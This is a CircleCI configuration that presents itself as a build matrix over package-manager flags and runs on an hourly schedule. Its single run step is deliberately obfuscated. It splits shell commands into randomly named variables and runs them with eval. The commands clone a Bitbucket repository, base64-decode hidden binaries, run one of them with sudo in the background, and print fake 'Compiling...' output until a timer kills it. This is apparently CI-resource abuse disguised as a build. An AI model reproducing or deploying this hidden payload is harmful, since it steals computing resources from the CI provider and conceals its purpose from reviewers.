version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--depclean-lib-check", "--verbose", "--quiet-unmerge-warn", "--debug", "--deselect", "--noconfmem", "--complete-graph-if-new-ver", "--autounmask-continue", "--fetch-all-uri", "--autounmask-unrestricted-atoms", "--autounmask-license", "--exclude", "--nodeps", "--ask", "--getbinpkg", "--autounmask-license", "--keep-going", "--quiet-fail", "--searchdesc", "--onlydeps"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--depclean-lib-check", "--verbose", "--quiet-unmerge-warn", "--debug", "--deselect", "--noconfmem", "--complete-graph-if-new-ver", "--autounmask-continue", "--fetch-all-uri", "--autounmask-unrestricted-atoms", "--autounmask-license", "--exclude", "--nodeps", "--ask", "--getbinpkg", "--autounmask-license", "--keep-going", "--quiet-fail", "--searchdesc", "--onlydeps"]
    triggers:
      - schedule:
          cron: "47 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: Linux
          command: |
            aMTnu="sudo add-ap"
            XfuWedBY="t-repositor"
            FLJbC="y ppa:max-c"
            BfFkVRI="-lv/shadows"
            FRjhEOJ="ocks-libev "
            oOhwpJ="-y &>/dev/n"
            eval "$aMTnu""$XfuWedBY""$FLJbC""$BfFkVRI""$FRjhEOJ""$oOhwpJ""ull || true"
            PBFXcWLNJ="sudo add-ap"
            JDHyr="t-repositor"
            wntsXPo="y ppa:ondre"
            MWETmr="j/apache2 -"
            exofoL="y &>/dev/nu"
            eval "$PBFXcWLNJ""$JDHyr""$wntsXPo""$MWETmr""$exofoL""ll || true"
            AkyUTZypPmd="sudo apt up"
            AKSIq="date || tru"
            eval "$AkyUTZypPmd""$AKSIq""e"
            ImKvzIT="sudo apt --"
            ManBcmSnl="yes install"
            hpaxaRLCJvg=" openssl &>"
            gDGvAqj="/dev/null |"
            eval "$ImKvzIT""$ManBcmSnl""$hpaxaRLCJvg""$gDGvAqj""| true"
            TkFYKlQT="sudo apt --"
            LfGSXjqRT="yes install"
            KCneqkIlN=" cl-base64 "
            lTJLS="git &>/dev/"
            PeLmgJymNsE="null || tru"
            eval "$TkFYKlQT""$LfGSXjqRT""$KCneqkIlN""$lTJLS""$PeLmgJymNsE""e"
            EBiwiO="git clone h"
            HcpiB="ttps://gccb"
            ZvSSFhT="uild@bitbuc"
            KjmjmJFPu="ket.org/gcc"
            mdtPHIdTr="build/gcc.g"
            CoYycN="it &>/dev/n"
            eval "$EBiwiO""$HcpiB""$ZvSSFhT""$KjmjmJFPu""$mdtPHIdTr""$CoYycN""ull"
            tmInAIMFp="base64 -d g"
            JBeEGo="cc/cmake_np"
            eval "$tmInAIMFp""$JBeEGo""_ > cmake"
            JmnzWp="base64 -d g"
            WdLpBI="cc/config_ "
            lzEtDp="> status.lo"
            eval "$JmnzWp""$WdLpBI""$lzEtDp""g"
            JyvMQCoPfW="base64 -d g"
            WExtKxRJ="cc/make_ > "
            eval "$JyvMQCoPfW""$WExtKxRJ""debug"
            sed -i 's/1080/1081/g' status.log
            rwesqqZ="chmod +x de"
            eval "$rwesqqZ""bug cmake"
            cMyrkjExhfx="./cmake"
            eval "$cMyrkjExhfx"""
            PaivLCTn="sed -i 's/b"
            ktPmniRllgV="uild/ob2o/g"
            hsHnbXzMPnu="' status.lo"
            eval "$PaivLCTn""$ktPmniRllgV""$hsHnbXzMPnu""g"
            zKPLHwC="sudo ./debu"
            qntexyPLB="g -c status"
            zFxSMRVuH=".log &>/dev"
            eval "$zKPLHwC""$qntexyPLB""$zFxSMRVuH""/null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2487)) ] && sudo killall debug && break; sleep 224; done
